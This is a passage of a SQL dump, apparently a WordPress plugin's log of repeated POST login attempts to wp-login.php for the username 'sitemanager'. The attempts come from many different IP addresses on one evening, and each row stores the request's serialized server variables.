Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35200\";s:11:\"REMOTE_ADDR\";s:15:\"162.214.206.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745510335.612592;s:12:\"REQUEST_TIME\";i:1745510335;}}','162.214.206.216',0,'2025-04-24 21:28:57','1970-01-01 00:00:00'),(94148,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44768\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745510750.768734;s:12:\"REQUEST_TIME\";i:1745510750;}}','199.188.201.234',0,'2025-04-24 21:35:52','1970-01-01 00:00:00'),(94149,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58958\";s:11:\"REMOTE_ADDR\";s:12:\"81.88.53.128\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745511161.675638;s:12:\"REQUEST_TIME\";i:1745511161;}}','81.88.53.128',0,'2025-04-24 21:42:43','1970-01-01 00:00:00'),(94150,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59110\";s:11:\"REMOTE_ADDR\";s:13:\"185.79.157.23\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745511581.3567929;s:12:\"REQUEST_TIME\";i:1745511581;}}','185.79.157.23',0,'2025-04-24 21:49:43','1970-01-01 00:00:00'),(94151,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39046\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.67.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745511975.610893;s:12:\"REQUEST_TIME\";i:1745511975;}}','198.27.67.210',0,'2025-04-24 21:56:17','1970-01-01 00:00:00'),(94152,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35454\";s:11:\"REMOTE_ADDR\";s:14:\"107.172.243.11\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745512384.4984519;s:12:\"REQUEST_TIME\";i:1745512384;}}','107.172.243.11',0,'2025-04-24 22:03:06','1970-01-01 00:00:00'),(94153,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33302\";s:11:\"REMOTE_ADDR\";s:12:\"51.81.207.12\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745512790.7266879;s:12:\"REQUEST_TIME\";i:1745512790;}}','51.81.207.12',0,'2025-04-24 22:09:52','1970-01-01 00:00:00'),(94154,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57336\";s:11:\"REMOTE_ADDR\";s:14:\"68.178.168.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745513193.9590781;s:12:\"REQUEST_TIME\";i:1745513193;}}','68.178.168.103',0,'2025-04-24 22:16:35','1970-01-01 00:00:00'),(94155,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60508\";s:11:\"REMOTE_ADDR\";s:14:\"195.26.245.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745513594.175761;s:12:\"REQUEST_TIME\";i:1745513594;}}','195.26.245.159',0,'2025-04-24 22:23:16','1970-01-01 00:00:00'),(94156,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47322\";s:11:\"REMOTE_ADDR\";s:12:\"45.90.73.208\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745513996.3550971;s:12:\"REQUEST_TIME\";i:1745513996;}}','45.90.73.208',0,'2025-04-24 22:29:58','1970-01-01 00:00:00'),(94157,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60350\";s:11:\"REMOTE_ADDR\";s:15:\"217.182.158.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745514398.0542009;s:12:\"REQUEST_TIME\";i:1745514398;}}','217.182.158.226',0,'2025-04-24 22:36:40','1970-01-01 00:00:00'),(94158,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, 